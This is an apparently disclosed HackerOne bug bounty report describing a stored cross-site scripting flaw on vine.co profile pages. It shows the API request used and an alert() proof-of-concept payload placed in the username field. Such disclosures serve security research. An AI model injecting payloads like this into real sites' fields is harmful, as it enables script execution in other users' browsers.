Twitter: [Stored XSS] vine.co - profile page

2014-11-21T13:39:29
ID H1:36986
Type hackerone
Reporter xorb
Modified 2015-03-26T22:34:57

Description

Stored XSS via API request: While creating new account in Windows mobile app, i noticed this request:

PUT /users/1147563919679037440 HTTP/1.1

avatarUrl=https%3A%2F%2Fvines.s3.amazonaws.com%2Favatars_trellis%2F2014%2F11%2F21%2F0B2EAE2EB81147563929149554688_1.3.4.jpg&username=

it seems that the variable username is not properly filtered, just set username to e.g. <svg/onload=alert()> and see result on your profile in vine web site.

"demo": https://vine.co/u/1147563919679037440